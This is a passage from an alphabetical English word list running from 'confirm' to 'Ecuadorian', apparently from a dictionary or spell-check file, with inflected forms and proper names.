confirm confirmation confirmations confirmatory confirmed confirming confirms confiscate confiscated confiscates confiscating confiscation confiscations conflagration conflict conflicted conflicting conflicts confluent confocal conform conformal conformance conformed conforming conformity conforms confound confounded confounding confounds confront confrontation confrontations confronted confronter confronters confronting confronts Confucian Confucianism Confucius confuse confused confuser confusers confuses confusing confusingly confusion confusions congenial congenially congenital congest congested congestion congestive conglomerate Congo Congolese congratulate congratulated congratulation congratulations congratulatory congregate congregated congregates congregating congregation congregations congress congresses congressional congressionally congressman congressmen congresswoman congresswomen congruence congruent conic conifer coniferous conjecture conjectured conjectures conjecturing conjoined conjugal conjugate conjunct conjuncted conjunction conjunctions conjunctive conjunctively conjuncts conjuncture conjure conjured conjurer conjures conjuring Conklin Conley Connally connect connected connectedness Connecticut connecting connection connectionless connections connective connectives connectivity connector connectors connects Connelly Conner Connie connivance connive connoisseur connoisseurs Connors connotation connotative connote connoted connotes connoting connubial conquer conquerable conquered conquerer conquerers conquering conqueror conquerors conquers conquest conquests Conrad Conrail conscience consciences conscientious conscientiously conscious consciously consciousness conscript conscription consecrate consecration consecutive consecutively consensual consensus consent consented consenter consenters consenting consents consequence consequences consequent consequential consequentialities consequentiality consequently consequents conservation conservationist conservationists conservations conservatism conservative conservatively conservatives conservator conserve conserved conserves conserving consider considerable considerably considerate considerately consideration considerations considered considering considers consign consigned consigning consigns consist consisted consistency consistent consistently consisting consists consolable consolation consolations console consoled consoler consolers consoles consolidate consolidated consolidates consolidating consolidation consoling consolingly consonant consonants consort consorted consorting consortium consorts conspicuous conspicuously conspiracies conspiracy conspirator conspirators conspire conspired conspires conspiring constable constables Constance constancy constant Constantine Constantinople constantly constants constellation constellations consternation constituencies constituency constituent constituents constitute constituted constitutes constituting constitution constitutional constitutionality constitutionally constitutions constitutive constrain constrained constraining constrains constraint constraints constrict construct constructed constructibility constructible constructing construction constructions constructive constructively constructor constructors constructs construe construed construing consul consular consulate consulates consuls consult consultant consultants consultation consultations consultative consulted consulting consults consumable consume consumed consumer consumers consumes consuming consummate consummated consummately consummation consumption consumptions consumptive consumptively contact contacted contacting contacts contagion contagious contagiously contain containable contained container containers containing containment containments contains contaminate contaminated contaminates contaminating contamination contemplate contemplated contemplates contemplating contemplation contemplations contemplative contemporaries contemporariness contemporary contempt contemptible contemptuous contemptuously contend contended contender contenders contending contends content contented contenting contention contentions contently contentment contents contest contestable contestant contested contester contesters contesting contests context contexts contextual contextually contiguity contiguous contiguously continent continental continentally continents contingencies contingency contingent contingents continual continually continuance continuances continuation continuations continue continued continues continuing continuities continuity continuous continuously continuum contortions contour contoured contouring contours contraband contraception contraceptive contract contracted contracting contraction contractions contractor contractors contracts contractual contractually contradict contradicted contradicting contradiction contradictions contradictory contradicts contradistinction contradistinctions contrapositive contrapositives contraption contraptions contrariness contrary contrast contrasted contraster contrasters contrasting contrastingly contrasts contribute contributed contributes contributing contribution contributions contributor contributorily contributors contributory contrite contrition contrivance contrivances contrive contrived contriver contrives contriving control controllability controllable controllably controlled controller controllers controlling controls controversial controversies controversy controvertible contumacious contumacy conundrum conundrums Convair convalescent convect convene convened convenes convenience conveniences convenient conveniently convening convent convention conventional conventionally conventions convents converge converged convergence convergent converges converging conversant conversantly conversation conversational conversationally conversations converse conversed conversely converses conversing conversion conversions convert converted converter converters convertibility convertible converting converts convex convey conveyance conveyances conveyed conveyer conveyers conveying conveyor conveys convict convicted convicting conviction convictions convicts convince convinced convincer convincers convinces convincing convincingly convivial convoke convoluted convolution convoy convoyed convoying convoys convulse convulsion convulsions Conway coo cooing cook cookbook Cooke cooked cookery cookie cookies cooking cooks cooky cool cooled cooler coolers coolest Cooley Coolidge coolie coolies cooling coolly coolness cools coon coons coop cooped cooper cooperate cooperated cooperates cooperating cooperation cooperations cooperative cooperatively cooperatives cooperator cooperators coopers coops coordinate coordinated coordinates coordinating coordination coordinations coordinator coordinators Coors cop cope coped Copeland Copenhagen Copernican Copernicus copes copied copier copiers copies coping copings copious copiously copiousness coplanar copper Copperfield copperhead coppers copra coprocessor cops copse copy copying copyright copyrightable copyrighted copyrights copywriter coquette coral Corbett Corcoran cord corded corder cordial cordiality cordially cords core cored corer corers cores Corey coriander coring Corinth Corinthian Corinthianize Corinthianizes Corinthians Coriolanus cork corked corker corkers corking corks corkscrew cormorant corn cornea Cornelia Cornelian Cornelius Cornell corner cornered corners cornerstone cornerstones cornet cornfield cornfields corning Cornish cornmeal corns cornstarch cornucopia Cornwall Cornwallis corny corollaries corollary Coronado coronaries coronary coronation coroner coronet coronets coroutine coroutines corporal corporals corporate corporately corporation corporations corps corpse corpses corpulent corpus corpuscular corral correct correctable corrected correcting correction corrections corrective correctively correctives correctly correctness corrector corrects correlate correlated correlates correlating correlation correlations correlative correspond corresponded correspondence correspondences correspondent correspondents corresponding correspondingly corresponds corridor corridors corrigenda corrigendum corrigible corroborate corroborated corroborates corroborating corroboration corroborations corroborative corrode corrosion corrosive corrugate corrupt corrupted corrupter corruptible corrupting corruption corruptions corrupts corset Corsica Corsican cortex Cortez cortical Cortland Corvallis Corvus Corydoras Cosgrove cosine cosines cosmetic cosmetics cosmic cosmology cosmopolitan cosmos cosponsor Cossack cost Costa costed Costello costing costly costs costume costumed costumer costumes costuming cosy cot cotangent cotillion cots cottage cottager cottages cotton cottonmouth cottons cottonseed cottonwood Cottrell cotyledon cotyledons couch couched couches couching cougar cough coughed coughing coughs could coulomb Coulter council councillor councillors councilman councilmen councils councilwoman councilwomen counsel counseled counseling counselled counselling counsellor counsellors counselor counselors counsels count countable countably counted countenance counter counteract counteracted counteracting counteractive counterargument counterattack counterbalance counterclockwise countered counterexample counterexamples counterfeit counterfeited counterfeiter counterfeiting counterflow countering counterintuitive counterman countermeasure countermeasures countermen counterpart counterparts counterpoint counterpointing counterpoise counterproductive counterproposal counterrevolution counters countersink countersunk countess counties counting countless countries country countryman countrymen countryside countrywide counts county countywide couple coupled coupler couplers couples coupling couplings coupon coupons courage courageous courageously courier couriers course coursed courser courses coursing court courted courteous courteously courter courters courtesan courtesies courtesy courthouse courthouses courtier courtiers courting courtly Courtney courtroom courtrooms courts courtship courtyard courtyards cousin cousins covalent covariant cove covenant covenants Covent Coventry cover coverable coverage covered covering coverings coverlet coverlets covers covert covertly coves covet coveted coveting covetous covetousness covets cow Cowan coward cowardice cowardly cowboy cowboys cowed cower cowered cowerer cowerers cowering coweringly cowers cowherd cowhide cowing cowl cowlick cowling cowls coworker cows cowslip cowslips coyote coyotes coypu cozier coziness cozy crab crabapple crabs crack cracked cracker crackers cracking crackle crackled crackles crackling crackpot cracks cradle cradled cradles craft crafted crafter craftiness crafting crafts craftsman craftsmen craftspeople craftsperson crafty crag craggy crags Craig cram Cramer cramming cramp cramps crams cranberries cranberry Crandall crane cranes Cranford crania cranium crank crankcase cranked crankier crankiest crankily cranking cranks crankshaft cranky cranny Cranston crash crashed crasher crashers crashes crashing crass crate crater craters crates cravat cravats crave craved craven craves craving Crawford crawl crawled crawler crawlers crawling crawls Cray crayon Crays craze crazed crazes crazier craziest crazily craziness crazing crazy creak creaked creaking creaks creaky cream creamed creamer creamers creamery creaming creams creamy crease creased creases creasing create created creates creating creation creations creative creatively creativeness creativity creator creators creature creatures credence credential credibility credible credibly credit creditable creditably credited crediting creditor creditors credits credulity credulous credulousness Cree creed creeds creek creeks creep creeper creepers creeping creeps creepy Creighton cremate cremated cremates cremating cremation cremations crematory Creole Creon crepe crept crescent crescents crest crested crestfallen crests Crestview Cretaceous Cretaceously Cretan Crete cretin crevice crevices crew crewcut crewed crewing crews crib cribs cricket crickets cried crier criers cries crime Crimea Crimean crimes criminal criminally criminals criminate crimson crimsoning cringe cringed cringes cringing cripple crippled cripples crippling crises crisis crisp Crispin crisply crispness crisscross criteria criterion critic critical critically criticism criticisms criticize criticized criticizes criticizing critics critique critiques critiquing critter croak croaked croaking croaks Croatia Croatian crochet crochets crock crockery Crockett crocks crocodile crocus croft Croix Cromwell Cromwellian crook crooked crooks crop cropped cropper croppers cropping crops Crosby cross crossable crossbar crossbars crossed crosser crossers crosses crossing crossings crossly crossover crossovers crosspoint crossroad crosstalk crosswalk crossword crosswords crotch crotchety crouch crouched crouching crow crowd crowded crowder crowding crowds crowed crowing Crowley crown crowned crowning crowns crows Croydon crucial crucially crucible crucified crucifies crucifix crucifixion crucify crucifying crud cruddy crude crudely crudeness cruder crudest cruel crueler cruelest cruelly cruelty Cruickshank cruise cruiser cruisers cruises cruising crumb crumble crumbled crumbles crumbling crumbly crumbs crummy crumple crumpled crumples crumpling crunch crunched crunches crunchier crunchiest crunching crunchy crusade crusader crusaders crusades crusading crush crushable crushed crusher crushers crushes crushing crushingly Crusoe crust crustacean crustaceans crusts crutch crutches crux cruxes Cruz cry crying cryogenic crypt cryptanalysis cryptanalyst cryptanalytic cryptic cryptogram cryptographer cryptographic cryptographically cryptography cryptologist cryptology crystal crystalline crystallize crystallized crystallizes crystallizing crystals cub Cuba Cuban Cubanize Cubanizes Cubans cubbyhole cube cubed cubes cubic cubs cuckoo cuckoos cucumber cucumbers cuddle cuddled cuddly cudgel cudgels cue cued cues cuff cufflink cuffs cuisine Culbertson culinary cull culled culler culling culls culminate culminated culminates culminating culmination culpa culpable culprit culprits cult cultivable cultivate cultivated cultivates cultivating cultivation cultivations cultivator cultivators cults cultural culturally culture cultured cultures culturing Culver Culvers Cumberland cumbersome Cummings Cummins cumulative cumulatively Cunard cunnilingus cunning Cunningham cunningly cup cupboard cupboards Cupertino cupful Cupid cupped cupping cups curable curably curb curbing curbs curd curdle cure cured cures curfew curfews curing curiosities curiosity curious curiouser curiousest curiously curl curled curler curlers curlicue curling curls curly Curran currant currants currencies currency current currently currentness currents curricular curriculum curriculums curried curries curry currying curs curse cursed curses cursing cursive cursor cursorily cursors cursory curt curtail curtailed curtails curtain curtained curtains curtate Curtis curtly curtness curtsies curtsy curvaceous curvature curve curved curves curvilinear curving Cushing cushion cushioned cushioning cushions Cushman cusp cusps custard Custer custodial custodian custodians custody custom customarily customary customer customers customizable customization customizations customize customized customizer customizers customizes customizing customs cut cutaneous cutback cute cutest cutlass cutlet cutoff cutout cutover cuts cutter cutters cutthroat cutting cuttingly cuttings cuttlefish Cuvier Cuzco Cyanamid cyanide cybernetic cybernetics cyberspace Cyclades cycle cycled cycles cyclic cyclically cycling cycloid cycloidal cycloids cyclone cyclones Cyclops cyclotron cyclotrons Cygnus cylinder cylinders cylindrical cymbal cymbals cynic cynical cynically Cynthia cypress Cyprian Cypriot Cyprus Cyril Cyrillic Cyrus cyst cysts cytology cytoplasm czar Czech Czechization Czechizations Czechoslovakia Czerniak dabble dabbled dabbler dabbles dabbling Dacca Dacron dactyl dactylic dad Dada Dadaism Dadaist Dadaistic daddy Dade dads Daedalus daemon daemons daffodil daffodils dagger Dahl dahlia Dahomey Dailey dailies daily Daimler daintily daintiness dainty dairy Dairylea daisies daisy Dakar Dakota dale dales Daley Dalhousie Dali Dallas Dalton Daly Dalzell dam damage damaged damager damagers damages damaging Damascus damask dame damming damn damnation damned damning damns Damocles Damon damp dampen dampens damper damping dampness dams damsel damsels Dan Dana Danbury dance danced dancer dancers dances dancing dandelion dandelions dandy Dane Danes danger dangerous dangerously dangers dangle dangled dangles dangling Daniel Daniels Danielson Danish Danization Danizations Danize Danizes Danny Dante Danube Danubian Danville Danzig Daphne Dar dare dared darer darers dares daresay daring daringly Darius dark darken darker darkest darkly darkness darkroom Darlene darling darlings Darlington darn darned darner darning darns DARPA Darrell Darrow Darry dart darted darter darting Dartmouth darts Darwin Darwinian Darwinism Darwinistic Darwinize Darwinizes dash dashboard dashed dasher dashers dashes dashing dashingly data database databases datagram datagrams Datamation Datamedia date dated dateline dater dates dating dative Datsun datum Daugherty daughter daughterly daughters daunt daunted dauntless Dave David Davidson Davie Davies Davinich Davis Davison Davy dawn dawned dawning dawns Dawson day daybreak daydream daydreaming daydreams daylight daylights days daytime Dayton Daytona daze dazed dazzle dazzled dazzler dazzles dazzling dazzlingly De deacon deacons deactivate dead deaden deadline deadlines deadlock deadlocked deadlocking deadlocks deadly deadness deadwood deaf deafen deafer deafest deafness deal dealer dealers dealership dealing dealings deallocate deallocated deallocating deallocation deallocations deals dealt dean Deane Deanna deans dear Dearborn dearer dearest dearly dearness dearth dearths death deathbed deathly deaths debacle debar debase debatable debate debated debater debaters debates debating debauch debauchery Debbie Debby debilitate debilitated debilitates debilitating debility debit debited Deborah Debra debrief debris debt debtor debts debug debugged debugger debuggers debugging debugs debunk Debussy debutante DEC decade decadence decadent decadently decades decal decathlon Decatur decay decayed decaying decays Decca decease deceased deceases deceasing decedent deceit deceitful deceitfully deceitfulness deceive deceived deceiver deceivers deceives deceiving decelerate decelerated decelerates decelerating deceleration December Decembers decencies decency decennial decent decently decentralization decentralized deception deceptions deceptive deceptively decertify decibel decidability decidable decide decided decidedly decides deciding deciduous decimal decimals decimate decimated decimates decimating decimation decipher deciphered decipherer deciphering deciphers decision decisions decisive decisively decisiveness deck decked Decker decking deckings decks declaration declarations declarative declaratively declaratives declarator declaratory declare declared declarer declarers declares declaring declassify declination declinations decline declined decliner decliners declines declining DECnet decode decoded decoder decoders decodes decoding decodings decolletage decollimate decompile decomposability decomposable decompose decomposed decomposes decomposing decomposition decompositions decompress decompression decorate decorated decorates decorating decoration decorations decorative decorum decouple decoupled decouples decoupling decoy decoys decrease decreased decreases decreasing decreasingly decree decreed decreeing decrees decrement decremented decrementing decrements decrypt decrypted decrypting decryption decrypts DECstation DECsystem DECtape dedicate dedicated dedicates dedicating dedication deduce deduced deducer deduces deducible deducing deduct deducted deductible deducting deduction deductions deductive Dee deed deeded deeding deeds deem deemed deeming deemphasize deemphasized deemphasizes deemphasizing deems deep deepen deepened deepening deepens deeper deepest deeply deeps deer Deere deface default defaulted defaulter defaulting defaults defeat defeated defeating defeats defecate defect defected defecting defection defections defective defects defend defendant defendants defended defender defenders defending defends defenestrate defenestrated defenestrates defenestrating defenestration defense defenseless defenses defensible defensive defer deference deferment deferments deferrable deferred deferrer deferrers deferring defers defiance defiant defiantly deficiencies deficiency deficient deficit deficits defied defies defile defiling definable define defined definer defines defining definite definitely definiteness definition definitional definitions definitive deflate deflater deflect defocus Defoe deforest deforestation deform deformation deformations deformed deformities deformity defraud defray defrost deftly defunct defy defying degeneracy degenerate degenerated degenerates degenerating degeneration degenerative degradable degradation degradations degrade degraded degrades degrading degree degrees dehumidify dehydrate deify deign deigned deigning deigns Deimos Deirdre Deirdres deities deity dejected dejectedly DeKalb DeKastere Del Delaney Delano Delaware delay delayed delaying delays delegate delegated delegates delegating delegation delegations delete deleted deleter deleterious deletes deleting deletion deletions Delft Delhi Delia deliberate deliberated deliberately deliberateness deliberates deliberating deliberation deliberations deliberative deliberator deliberators delicacies delicacy delicate delicately delicatessen delicious deliciously delight delighted delightedly delightful delightfully delighting delights Delilah delimit delimitation delimited delimiter delimiters delimiting delimits delineament delineate delineated delineates delineating delineation delinquency delinquent delirious deliriously delirium deliver deliverable deliverables deliverance delivered deliverer deliverers deliveries delivering delivers delivery dell Della dells Dellwood Delmarva Delphi Delphic Delphically Delphinus delta deltas delude deluded deludes deluding deluge deluged deluges delusion delusions deluxe delve delves delving demagnify demagogue demand demanded demander demanding demandingly demands demarcate demeanor demented demerit Demeter demigod demise demo democracies democracy democrat democratic democratically democrats demodulate demodulator demographic demolish demolished demolishes demolition demon demoniac demonic demons demonstrable demonstrate demonstrated demonstrates demonstrating demonstration demonstrations demonstrative demonstratively demonstrator demonstrators demoralize demoralized demoralizes demoralizing DeMorgan demote demountable Dempsey demultiplex demultiplexed demultiplexer demultiplexers demultiplexing demur demythologize den denature Deneb Denebola Deneen deniable denial denials denied denier denies denigrate denigrated denigrates denigrating denizen Denmark Dennis Denny denominate denomination denominations denominator denominators denotable denotation denotational denotationally denotations denotative denote denoted denotes denoting denounce denounced denounces denouncing dens dense densely denseness denser densest densities density dent dental dentally dented denting dentist dentistry dentists Denton dents denture denude denumerable denunciate denunciation Denver deny denying deodorant deoxyribonucleic depart departed departing department departmental departments departs departure departures depend dependability dependable dependably depended dependence dependencies dependency dependent dependently dependents depending depends depict depicted depicting depicts deplete depleted depletes depleting depletion depletions deplorable deplore deplored deplores deploring deploy deployed deploying deployment deployments deploys deport deportation deportee deportment depose deposed deposes deposit depositary deposited depositing deposition depositions depositor depositors depository deposits depot depots deprave depraved depravity deprecate depreciate depreciated depreciates depreciation depress depressed depresses depressing depression depressions deprivation deprivations deprive deprived deprives depriving depth depths deputies deputy dequeue dequeued dequeues dequeuing derail derailed derailing derails derby Derbyshire dereference deregulate deregulated Derek deride derision derivable derivation derivations derivative derivatives derive derived derives deriving derogatory derrick derriere dervish Des Descartes descend descendant descendants descended descendent descender descenders descending descends descent descents describable describe described describer describes describing description descriptions descriptive descriptively descriptives descriptor descriptors descry desecrate desegregate desert deserted deserter deserters deserting desertion desertions deserts deserve deserved deserves deserving deservingly deservings desiderata desideratum design designate designated designates designating designation designations designator designators designed designer designers designing designs desirability desirable desirably desire desired desires desiring desirous desist desk desks desktop Desmond desolate desolately desolation desolations despair despaired despairing despairingly despairs despatch despatched desperado desperate desperately desperation despicable despise despised despises despising despite despoil despondent despot despotic despotism despots dessert desserts desiccate destabilize destination destinations destine destined destinies destiny destitute destitution destroy destroyed destroyer destroyers destroying destroys destruct destruction destructions destructive destructively destructiveness destructor destuff destuffing destuffs desuetude desultory desynchronize detach detached detacher detaches detaching detachment detachments detail detailed detailing details detain detained detaining detains detect detectable detectably detected detecting detection detections detective detectives detector detectors detects detente detention deter detergent deteriorate deteriorated deteriorates deteriorating deterioration determinable determinacy determinant determinants determinate determinately determination determinations determinative determine determined determiner determiners determines determining determinism deterministic deterministically deterred deterrent deterring detest detestable detested detour detract detractor detractors detracts detriment detrimental Detroit deuce deus deuterium Deutsch devastate devastated devastates devastating devastation develop developed developer developers developing development developmental developments develops deviant deviants deviate deviated deviates deviating deviation deviations device devices devil devilish devilishly devils devious devise devised devises devising devisings devoid devolve Devon Devonshire devote devoted devotedly devotee devotees devotes devoting devotion devotions devour devoured devourer devours devout devoutly devoutness dew dewdrop dewdrops Dewey Dewitt dewy Dexedrine dexterity Dhabi diabetes diabetic diabolic diachronic diacritical diadem diagnosable diagnose diagnosed diagnoses diagnosing diagnosis diagnostic diagnostician diagnostics diagonal diagonally diagonals diagram diagrammable diagrammatic diagrammatically diagrammed diagrammer diagrammers diagramming diagrams dial dialect dialectic dialects dialed dialer dialers dialing dialog dialogs dialogue dialogues dials dialup dialysis diamagnetic diameter diameters diametric diametrically diamond diamonds Diana Diane Dianne diaper diapers diaphragm diaphragms diaries diarrhea diary diatribe diatribes dibble dice dichotomize dichotomy dickens Dickerson Dickinson Dickson dicky dictate dictated dictates dictating dictation dictations dictator dictatorial dictators dictatorship diction dictionaries dictionary dictum dictums did didactic diddle Dido die Diebold died Diego diehard dielectric dielectrics diem dies diesel diet dietary dieter dieters dietetic dietician dietitian dietitians Dietrich diets Dietz differ differed difference differences different differentiable differential differentials differentiate differentiated differentiates differentiating differentiation differentiations differentiators differently differer differers differing differs difficult difficulties difficultly difficulty diffract diffuse diffused diffusely diffuser diffusers diffuses diffusible diffusing diffusion diffusions diffusive dig digest digested digestible digesting digestion digestive digests digger diggers digging diggings digit digital digitalis digitally digitization digitize digitized digitizes digitizing digits dignified dignify dignitary dignities dignity digram digress digressed digresses digressing digression digressions digressive digs dihedral Dijkstra Dijon dike dikes dilapidate dilatation dilate dilated dilates dilating dilation dildo dilemma dilemmas diligence diligent diligently dill Dillon dilogarithm dilute diluted dilutes diluting dilution dim DiMaggio dime dimension dimensional dimensionality dimensionally dimensioned dimensioning dimensions dimes dimetrodon diminish diminished diminishes diminishing diminution diminutive dimly dimmed dimmer dimmers dimmest dimming dimness dimple dims din Dinah dine dined diner diners dines ding dinghy dinginess dingo dingy dining dinner dinners dinnertime dinnerware dinosaur dint Diocletian diode diodes Diogenes Dion Dionysian Dionysus Diophantine diopter diorama dioxide dip diphtheria diphthong Diplodocus diploma diplomacy diplomas diplomat diplomatic diplomats dipole dipped dipper dippers dipping dippings dips Dirac dire direct directed directing direction directional directionality directionally directions directive directives directly directness director directorate directories directors directory directrices directrix directs dirge dirges Dirichlet dirt dirtier dirtiest dirtily dirtiness dirts dirty Dis disabilities disability disable disabled disabler disablers disables disabling disadvantage disadvantageous disadvantages disaffected disaffection disagree disagreeable disagreed disagreeing disagreement disagreements disagrees disallow disallowed disallowing disallows disambiguate disambiguated disambiguates disambiguating disambiguation disambiguations disappear disappearance disappearances disappeared disappearing disappears disappoint disappointed disappointing disappointment disappointments disapproval disapprove disapproved disapproves disarm disarmament disarmed disarming disarms disassemble disassembled disassembles disassembling disassembly disaster disasters disastrous disastrously disband disbanded disbanding disbands disburse disbursed disbursement disbursements disburses disbursing disc discard discarded discarding discards discern discerned discernibility discernible discernibly discerning discerningly discernment discerns discharge discharged discharges discharging disciple disciples disciplinary discipline disciplined disciplines disciplining disclaim disclaimed disclaimer disclaims disclose disclosed discloses disclosing disclosure disclosures discomfort disconcert disconcerting disconcertingly disconnect disconnected disconnecting disconnection disconnects discontent discontented discontinuance discontinue discontinued discontinues discontinuities discontinuity discontinuous discord discordant discount discounted discounting discounts discourage discouraged discouragement discourages discouraging discourse discourses discover discovered discoverer discoverers discoveries discovering discovers discovery discredit discredited discreet discreetly discrepancies discrepancy discrete discretely discreteness discretion discretionary discriminant discriminate discriminated discriminates discriminating discrimination discriminatory discs discuss discussant discussed discusses discussing discussion discussions disdain disdaining disdains disease diseased diseases disembowel disengage disengaged disengages disengaging disentangle disentangling disfigure disfigured disfigures disfiguring disgorge disgrace disgraced disgraceful disgracefully disgraces disgruntle disgruntled disguise disguised disguises disgust disgusted disgustedly disgustful disgusting disgustingly disgusts dish dishearten disheartening dished dishes dishevel dishing dishonest dishonestly dishonesty dishonor dishonorable dishonored dishonoring dishonors dishwasher dishwashers dishwashing dishwater disillusion disillusioned disillusioning disillusionment disillusionments disinclined disingenuous disinterested disinterestedness disjoint disjointed disjointly disjointness disjunct disjunction disjunctions disjunctive disjunctively disjuncts disk diskette diskettes disks dislike disliked dislikes disliking dislocate dislocated dislocates dislocating dislocation dislocations dislodge dislodged dismal dismally dismay dismayed dismaying dismember dismembered dismemberment dismembers dismiss dismissal dismissals dismissed dismisser dismissers dismisses dismissing dismount dismounted dismounting dismounts Disney Disneyland disobedience disobedient disobey disobeyed disobeying disobeys disorder disordered disorderly disorders disorganized disown disowned disowning disowns disparage disparate disparities disparity dispassionate dispatch dispatched dispatcher dispatchers dispatches dispatching dispel dispell dispelled dispelling dispels dispensary dispensation dispense dispensed dispenser dispensers dispenses dispensing dispersal disperse dispersed disperses dispersing dispersion dispersions displace displaced displacement displacements displaces displacing display displayable displayed displayer displaying displays displease displeased displeases displeasing displeasure disposable disposal disposals dispose disposed disposer disposes disposing disposition dispositions dispossessed disproportionate disprove disproved disproves disproving dispute disputed disputer disputers disputes disputing disqualification disqualified disqualifies disqualify disqualifying disquiet disquieting Disraeli disregard disregarded disregarding disregards disrespectful disrupt disrupted disrupting disruption disruptions disruptive disrupts dissatisfaction dissatisfactions dissatisfactory dissatisfied dissect dissects dissemble disseminate disseminated disseminates disseminating dissemination dissension dissensions dissent dissented dissenter dissenters dissenting dissents dissertation dissertations disservice dissident dissidents dissimilar dissimilarities dissimilarity dissipate dissipated dissipates dissipating dissipation dissociate dissociated dissociates dissociating dissociation dissolution dissolutions dissolve dissolved dissolves dissolving dissonant dissuade distaff distal distally distance distances distant distantly distaste distasteful distastefully distastes distemper distempered distempers distill distillation distilled distiller distillers distillery distilling distills distinct distinction distinctions distinctive distinctively distinctiveness distinctly distinctness distinguish distinguishable distinguished distinguishes distinguishing distort distorted distorting distortion distortions distorts distract distracted distracting distraction distractions distracts distraught distress distressed distresses distressing distribute distributed distributes distributing distribution distributional distributions distributive distributivity distributor distributors district districts distrust distrusted disturb disturbance disturbances disturbed disturber disturbing disturbingly disturbs disuse ditch ditches dither ditto ditty Ditzel diurnal divan divans dive dived diver diverge diverged divergence divergences divergent diverges diverging divers diverse diversely diversification diversified diversifies diversify diversifying diversion diversionary diversions diversities diversity divert diverted diverting diverts dives divest divested divesting divestiture divests divide divided dividend dividends divider dividers divides dividing divine divinely diviner diving divining divinities divinity divisibility divisible division divisional divisions divisive divisor divisors divorce divorced divorcee divulge divulged divulges divulging Dixie Dixiecrats Dixieland Dixon dizziness dizzy Djakarta Dmitri Dnieper do Dobbin Dobbs Doberman Doc docile dock docked docket docks dockside dockyard doctor doctoral doctorate doctorates doctored doctors doctrinaire doctrinal doctrine doctrines document documentaries documentary documentation documentations documented documenter documenters documenting documents Dodd dodecahedra dodecahedral dodecahedron dodge dodged dodger dodgers dodging Dodington Dodson doe doer doers does dog Doge dogged doggedly doggedness dogging doghouse dogma dogmas dogmatic dogmatism dogs Dogtown Doherty doing doings Dolan doldrum dole doled doleful dolefully doles doll dollar dollars dollies dolls dolly Dolores dolphin dolphins domain domains dome domed Domenico domes Domesday domestic domestically domesticate domesticated domesticates domesticating domestication domicile dominance dominant dominantly dominate dominated dominates dominating domination domineer domineering Domingo Dominic Dominican Dominicans Dominick dominion Dominique domino don Donahue Donald Donaldson donate donated donates donating donation done Doneck donkey donkeys Donna Donnelly Donner donnybrook donor Donovan dons doodle Dooley Doolittle doom doomed dooming dooms doomsday door doorbell doorkeeper doorman doormen doors doorstep doorsteps doorway doorways dope doped doper dopers dopes doping Doppler Dora Dorado Dorcas Dorchester Doreen Doria Doric Doricize Doricizes Doris dormant dormitories dormitory Dorothea Dorothy Dorset Dortmund dosage dose dosed doses dossier dossiers Dostoevsky dot dote doted dotes doting dotingly dots dotted dotting double doubled Doubleday doubleheader doubler doublers doubles doublet doubleton doublets doubling doubloon doubly doubt doubtable doubted doubter doubters doubtful doubtfully doubting doubtless doubtlessly doubts Doug dough Dougherty doughnut doughnuts Douglas Douglass dove dover doves dovetail Dow dowager dowel Dowling down downcast downed downers Downey downfall downfallen downgrade downhill Downing downlink downlinks download downloaded downloading downloads downplay downplayed downplaying downplays downpour downright Downs downside downstairs downstream downtown downtowns downtrodden downturn downward downwards downy dowry Doyle doze dozed dozen dozens dozenth dozes dozing drab Draco Draconian draft drafted draftee drafter drafters drafting drafts draftsman draftsmen drafty drag dragged dragging dragnet dragon dragonfly dragonhead dragons dragoon dragooned dragoons drags drain drainage drained drainer draining drains drake dram drama Dramamine dramas dramatic dramatically dramatics dramatist dramatists drank drape draped draper draperies drapers drapery drapes drastic drastically draught draughts Dravidian draw drawback drawbacks drawbridge drawbridges drawer drawers drawing drawings drawl drawled drawling drawls drawn drawnly drawnness draws dread dreaded dreadful dreadfully dreading dreadnought dreads dream dreamboat dreamed dreamer dreamers dreamily dreaming dreamlike dreams dreamt dreamy dreariness dreary dredge dregs drench drenched drenches drenching dress dressed dresser dressers dresses dressing dressings dressmaker dressmakers drew Drexel Dreyfuss dried drier driers dries driest drift drifted drifter drifters drifting drifts drill drilled driller drilling drills drily drink drinkable drinker drinkers drinking drinks drip dripping drippy drips Driscoll drive driven driver drivers drives driveway driveways driving drizzle drizzly droll dromedary drone drones drool droop drooped drooping droops droopy drop droplet dropout dropped dropper droppers dropping droppings drops drosophila drought droughts drove drover drovers droves drown drowned drowning drownings drowns drowsiness drowsy drubbing drudge drudgery drug druggist druggists drugs drugstore drum drumhead drummed drummer drummers drumming Drummond drums drunk drunkard drunkards drunken drunkenness drunker drunkly drunks Drury dry Dryden drying dryly dual dualism dualities duality Duane dub dubbed Dubhe dubious dubiously dubiousness Dublin dubs Dubuque duchess duchesses duchy duck ducked ducking duckling ducks duct ducts dud Dudley due duel dueling duels dues duet Duffy dug Dugan duke dukes dull dulled duller Dulles dullest dulling dullness dulls dully Duluth duly dumb dumbbell dumbbells dumber dumbest dumbly dumbness dummies dummy dump dumped dumper dumping dumps Dumpty Dunbar Duncan dunce dunces Dundee dune Dunedin dunes dung dungeon dungeons Dunham dunk Dunkirk Dunlap Dunlop Dunn Dunne dupe duplex duplicable duplicate duplicated duplicates duplicating duplication duplications duplicator duplicators duplicity DuPont Dupont DuPonts Duponts Duquesne durabilities durability durable durably Durango duration durations Durer Durers duress Durham during Durkee Durkin Durrell Durward Dusenberg Dusenbury dusk duskiness dusky Dusseldorf dust dustbin dusted duster dusters dustier dustiest Dustin dusting dusts dusty Dutch dutchess Dutchman Dutchmen duties dutiful dutifully dutifulness Dutton duty Dvorak dwarf dwarfed dwarfs dwarves dwell dwelled dweller dwellers dwelling dwellings dwells dwelt Dwight dwindle dwindled dwindling Dwyer dyad dyadic dye dyed dyeing dyer dyers dyes dying Dyke Dylan dynamic dynamically dynamics dynamism dynamite dynamited dynamites dynamiting dynamo dynastic dynasties dynasty dyne dysentery dyspeptic dystrophy each Eagan eager eagerly eagerness eagle eagles ear eardrum eared earl earlier earliest earliness earls early earmark earmarked earmarking earmarkings earmarks earn earned earner earners earnest earnestly earnestness earning earnings earns Earp earphone earring earrings ears earsplitting earth earthen earthenware earthliness earthling earthly Earthman Earthmen earthmover earthquake earthquakes earths earthworm earthworms earthy ease eased easel easement easements eases easier easiest easily easiness easing east eastbound easter eastern easterner easterners easternmost Easthampton Eastland Eastman eastward eastwards Eastwick Eastwood easy easygoing eat eaten eater eaters eating eatings Eaton eats eaves eavesdrop eavesdropped eavesdropper eavesdroppers eavesdropping eavesdrops ebb ebbing ebbs Eben ebony eccentric eccentricities eccentricity eccentrics Eccles ecclesiastical echelon echo echoed echoes echoing eclectic eclipse eclipsed eclipses eclipsing ecliptic Ecole ecology econometric Econometrica economic economical economically economics economies economist economists economize economized economizer economizers economizes economizing economy ecosystem ecstasy ecstatic Ecuador Ecuadorian 